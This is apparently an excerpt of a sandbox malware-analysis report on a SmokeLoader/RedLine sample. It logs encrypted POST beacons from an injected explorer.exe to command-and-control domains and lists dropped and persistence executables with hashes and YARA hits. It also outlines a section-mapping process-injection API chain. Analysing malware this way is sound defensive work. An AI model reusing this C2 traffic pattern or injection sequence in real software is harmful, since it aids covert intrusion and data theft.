                                        2024-10-07 13:02:40 UTC278OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 60 e4 1f 89 b0 c2 06 13 b3 2c 7a bb 5b c5 ee 61 00 e8 19 42 7f af d6 f1 4e dd fa 03 67 8e b4 3e bf 62 47 85 f5 6d 04 69 02 07 56 df 05 d2 9e db 26 cb 8e 5d 20 39 b1 0d 34 f2 38 15 f4 ce 9f b9 03 67 84 6f d9 6c a8 2d 66 97 10 d3 5c 60 64 73 5a c5 ce 50 b1 85 64 f5 19 7f 8c d0 d0 28 b6 ec 7b b4 bf fb d1 07 27 9d a5 81 43 27 90 0d 0b d8 16 4f 14 bf 57 19 51 f0 27 71 50 8a d6 c6 2e 7e a5 b1 01 8e 52 99 d6 aa 7b 32 39 27 d4 13 15 7c 2d 6a ea 0f fb ae 29 56 25 25 45 8f bd 77 58 33 38 86 fa fe 2a fa e9 0d f1 72 89 9e dc 97 0f cd 45
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<`,z[aBNg>bGmiV&] 948gol-f\`dsZPd({'C'OWQ'qP.~R{29'|-j)V%%EwX38*rE
                                        2024-10-07 13:02:41 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:02:40 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.550029188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:03:02 UTC286OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://dtojnsdaxdil.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 300
                                        Host: calvinandhalls.com
                                        2024-10-07 13:03:02 UTC300OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 67 db 36 96 87 f8 49 4b ba 0a 38 9c 58 c3 80 61 32 c5 2d 5e 2f 94 c8 f6 40 e1 aa 40 7d f8 bb 20 e9 6e 71 e8 e1 0a 7c 66 7d 39 4f d8 09 db fc b2 4c f4 a9 65 15 45 81 0d 1a af 21 57 89 ff ae 86 2d 39 94 04 b0 76 82 37 5a 93 29 82 57 29 30 1f 59 f0 fa 7c 9d 8d 60 d8 52 1d 9c fc 9d 5a a6 9b 77 ae bc a8 a7 26 68 a9 ce c8 49 01 ce 02 07 ef 72 1b 4f b2 44 10 34 fd 3f 09 1e 85 cf e6 25 6f 9c ae 79 bf 32 e2 a6 b2 7e 60 29 56 fd 0c 69 1e 0d 3a b2 33 e6 c5 34 3f 17 37 54 c0 b6 4f 6e 0e 27 d9 8d 81 58 f1 c2 64 de 33 a2 bc b2 92 4b be 39
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<g6IK8Xa2-^/@@} nq|f}9OLeE!W-9v7Z)W)0Y|`RZw&hIrOD4?%oy2~`)Vi:34?7TOn'Xd3K9
                                        2024-10-07 13:03:02 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:03:02 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.550030188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:03:03 UTC286OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://mwlktdttfgqo.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 270
                                        Host: bestworldhools.com
                                        2024-10-07 13:03:03 UTC270OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 67 b6 33 be a4 ee 44 04 cc 25 3b a6 3b 8f 8a 3b 39 ac 05 22 5c 91 f8 c0 43 d8 cb 10 1f 88 fa 6a b7 22 51 8d 93 5a 07 60 7c 5a 21 c5 64 a5 fc 8b 51 fd 83 25 38 51 af 51 23 ec 4b 6c 94 88 8a 96 12 60 c1 7a ae 73 b9 67 70 cd 1c a4 46 52 2e 6c 51 e4 e3 06 e1 d7 1a d5 57 69 91 c8 8b 36 aa bb 1b e9 d8 f0 c7 46 3d dd cf 81 42 0e b8 57 1f 95 14 40 3d ed 37 72 33 f6 17 3d 07 fb c7 c2 61 70 c9 d3 12 af 64 f0 e7 dc 3d 64 1a 28 b6 00 76 4b 08 77 d5 3e e3 c0 1c 34 21 61 57 d7 b5 53 52 31 5c 9b d2 81 52 df ae 23 83 48 b0 9f f3 a2 15 94 34
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<g3D%;;;9"\Cj"QZ`|Z!dQ%8QQ#Kl`zsgpFR.lQWi6F=BW@=7r3=apd=d(vKw>4!aWSR1\R#H4
                                        2024-10-07 13:03:03 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:03:03 GMT
                                        Connection: close


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:08:58:55
                                        Start date:07/10/2024
                                        Path:C:\Users\user\Desktop\BzLGqYKy7o.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\BzLGqYKy7o.exe"
                                        Imagebase:0x400000
                                        File size:447'488 bytes
                                        MD5 hash:D0D4805488E7E745515FFF2165D3CC05
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:08:59:01
                                        Start date:07/10/2024
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff674740000
                                        File size:5'141'208 bytes
                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:4
                                        Start time:08:59:20
                                        Start date:07/10/2024
                                        Path:C:\Users\user\AppData\Roaming\teihrdr
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\teihrdr
                                        Imagebase:0x400000
                                        File size:447'488 bytes
                                        MD5 hash:D0D4805488E7E745515FFF2165D3CC05
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2369051681.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 32%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:08:59:47
                                        Start date:07/10/2024
                                        Path:C:\Users\user\AppData\Local\Temp\B9A0.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\B9A0.exe
                                        Imagebase:0x400000
                                        File size:445'952 bytes
                                        MD5 hash:0719C6940AABCC832DB40F7EE68A25DC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2645014782.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2593902376.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2644866394.000000000058D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:09:00:01
                                        Start date:07/10/2024
                                        Path:C:\Users\user\AppData\Roaming\teihrdr
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\teihrdr
                                        Imagebase:0x400000
                                        File size:447'488 bytes
                                        MD5 hash:D0D4805488E7E745515FFF2165D3CC05
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2780779918.000000000072F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2780540702.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:09:00:11
                                        Start date:07/10/2024
                                        Path:C:\Users\user\AppData\Roaming\jtihrdr
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\jtihrdr
                                        Imagebase:0x400000
                                        File size:445'952 bytes
                                        MD5 hash:0719C6940AABCC832DB40F7EE68A25DC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000003.2830678754.0000000000530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2882578584.000000000057D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.2882377555.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:7.9%
                                          Dynamic/Decrypted Code Coverage:42.6%
                                          Signature Coverage:43.4%
                                          Total number of Nodes:122
                                          Total number of Limit Nodes:4
                                          execution_graph 3457 402e40 3459 402e37 3457->3459 3460 402edf 3459->3460 3461 4018e6 3459->3461 3462 4018f5 3461->3462 3463 40192e Sleep 3462->3463 3464 401949 3463->3464 3466 40195a 3464->3466 3467 401514 3464->3467 3466->3460 3468 401524 3467->3468 3469 4015c4 NtDuplicateObject 3468->3469 3470 4016e0 3468->3470 3469->3470 3471 4015e1 NtCreateSection 3469->3471 3470->3466 3472 401661 NtCreateSection 3471->3472 3473 401607 NtMapViewOfSection 3471->3473 3472->3470 3474 40168d 3472->3474 3473->3472 3475 40162a NtMapViewOfSection 3473->3475 3474->3470 3476 401697 NtMapViewOfSection 3474->3476 3475->3472 3477 401648 3475->3477 3476->3470 3478 4016be NtMapViewOfSection 3476->3478 3477->3472 3478->3470 3578 401542 3579 40153b 3578->3579 3580 4015c4 NtDuplicateObject 3579->3580 3584 4016e0 3579->3584 3581 4015e1 NtCreateSection 3580->3581 3580->3584 3582 401661 NtCreateSection 3581->3582 3583 401607 NtMapViewOfSection 3581->3583 3582->3584 3585 40168d 3582->3585 3583->3582 3586 40162a NtMapViewOfSection 3583->3586 3585->3584 3587 401697 NtMapViewOfSection 3585->3587 3586->3582 3588 401648 3586->3588 3587->3584 3589 4016be NtMapViewOfSection 3587->3589 3588->3582 3589->3584 3502 5afa30 3503 5afa3f 3502->3503 3506 5b01d0 3503->3506 3511 5b01eb 3506->3511 3507 5b01f4 CreateToolhelp32Snapshot 3508 5b0210 Module32First 3507->3508 3507->3511 3509 5b021f 3508->3509 3512 5afa48 3508->3512 3513 5afe8f 3509->3513 3511->3507 3511->3508 3514 5afeba 3513->3514 3515 5afecb VirtualAlloc 3514->3515 3516 5aff03 3514->3516 3515->3516 3516->3516 3517 4e0005 3522 4e092b GetPEB 3517->3522 3519 4e0030 3524 4e003c 3519->3524 3523 4e0972 3522->3523 3523->3519 3525 4e0049 3524->3525 3526 4e0e0f 2 API calls 3525->3526 3527 4e0223 3526->3527 3528 4e0d90 GetPEB 3527->3528 3529 4e0238 VirtualAlloc 3528->3529 3530 4e0265 3529->3530 3531 4e02ce VirtualProtect 3530->3531 3533 4e030b 3531->3533 3532 4e0439 VirtualFree 3536 4e04be LoadLibraryA 3532->3536 3533->3532 3535 4e08c7 3536->3535 3537 4e0001 3538 4e0005 3537->3538 3539 4e092b GetPEB 3538->3539 3540 4e0030 3539->3540 3541 4e003c 7 API calls 3540->3541 3542 4e0038 3541->3542 3637 402dd0 3638 402ddc 3637->3638 3639 4018e6 8 API calls 3638->3639 3640 402edf 3638->3640 3639->3640 3559 4018f1 3560 4018f6 3559->3560 3561 40192e Sleep 3560->3561 3562 401949 3561->3562 3563 401514 7 API calls 3562->3563 3564 40195a 3562->3564 3563->3564 3479 4e003c 3480 4e0049 3479->3480 3492 4e0e0f SetErrorMode SetErrorMode 3480->3492 3485 4e0265 3486 4e02ce VirtualProtect 3485->3486 3488 4e030b 3486->3488 3487 4e0439 VirtualFree 3491 4e04be LoadLibraryA 3487->3491 3488->3487 3490 4e08c7 3491->3490 3493 4e0223 3492->3493 3494 4e0d90 3493->3494 3495 4e0dad 3494->3495 3496 4e0dbb GetPEB 3495->3496 3497 4e0238 VirtualAlloc 3495->3497 3496->3497 3497->3485 3624 401915 3625 4018c6 3624->3625 3626 40191a 3624->3626 3627 40192e Sleep 3626->3627 3628 401949 3627->3628 3629 401514 7 API calls 3628->3629 3630 40195a 3628->3630 3629->3630 3498 402f97 3499 4030ee 3498->3499 3500 402fc1 3498->3500 3500->3499 3501 40307c RtlCreateUserThread NtTerminateProcess 3500->3501 3501->3499 3614 402d7b 3617 402d38 3614->3617 3615 402dc7 3616 4018e6 8 API calls 3616->3615 3617->3614 3617->3615 3617->3616 3555 5afa24 3556 5afa30 3555->3556 3557 5b01d0 3 API calls 3556->3557 3558 5afa48 3557->3558 3565 4014fe 3566 401506 3565->3566 3567 401531 3565->3567 3568 4015c4 NtDuplicateObject 3567->3568 3572 4016e0 3567->3572 3569 4015e1 NtCreateSection 3568->3569 3568->3572 3570 401661 NtCreateSection 3569->3570 3571 401607 NtMapViewOfSection 3569->3571 3570->3572 3573 40168d 3570->3573 3571->3570 3574 40162a NtMapViewOfSection 3571->3574 3573->3572 3575 401697 NtMapViewOfSection 3573->3575 3574->3570 3576 401648 3574->3576 3575->3572 3577 4016be NtMapViewOfSection 3575->3577 3576->3570 3577->3572

                                          Executed Functions

                                          Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 114 4015c4-4015db NtDuplicateObject 104->114 105->106 111 4018c5 106->111 112 4018bc-4018e3 call 401193 106->112 111->112 114->105 117 4015e1-401605 NtCreateSection 114->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->105 122 40168d-401691 119->122 120->119 123 40162a-401646 NtMapViewOfSection 120->123 122->105 124 401697-4016b8 NtMapViewOfSection 122->124 123->119 126 401648-40165e 123->126 124->105 127 4016be-4016da NtMapViewOfSection 124->127 126->119 127->105 130 4016e0 call 4016e5 127->130
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                          • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                          • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                          • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                          Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 161 4015c4-4015db NtDuplicateObject 151->161 152->153 158 4018c5 153->158 159 4018bc-4018e3 call 401193 153->159 158->159 161->152 164 4015e1-401605 NtCreateSection 161->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->152 169 40168d-401691 166->169 167->166 170 40162a-401646 NtMapViewOfSection 167->170 169->152 171 401697-4016b8 NtMapViewOfSection 169->171 170->166 173 401648-40165e 170->173 171->152 174 4016be-4016da NtMapViewOfSection 171->174 173->166 174->152 177 4016e0 call 4016e5 174->177
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectView
                                          • String ID:
                                          • API String ID: 1652636561-0
                                          • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                          • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                          • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                          • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                          Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 205 4015c4-4015db NtDuplicateObject 195->205 196->197 202 4018c5 197->202 203 4018bc-4018e3 call 401193 197->203 202->203 205->196 208 4015e1-401605 NtCreateSection 205->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->196 213 40168d-401691 210->213 211->210 214 40162a-401646 NtMapViewOfSection 211->214 213->196 215 401697-4016b8 NtMapViewOfSection 213->215 214->210 217 401648-40165e 214->217 215->196 218 4016be-4016da NtMapViewOfSection 215->218 217->210 218->196 221 4016e0 call 4016e5 218->221
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                          • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                          • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                          • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                          Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 244 4015c4-4015db NtDuplicateObject 234->244 235->236 241 4018c5 236->241 242 4018bc-4018e3 call 401193 236->242 241->242 244->235 247 4015e1-401605 NtCreateSection 244->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->235 252 40168d-401691 249->252 250->249 253 40162a-401646 NtMapViewOfSection 250->253 252->235 254 401697-4016b8 NtMapViewOfSection 252->254 253->249 256 401648-40165e 253->256 254->235 257 4016be-4016da NtMapViewOfSection 254->257 256->249 257->235 260 4016e0 call 4016e5 257->260
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
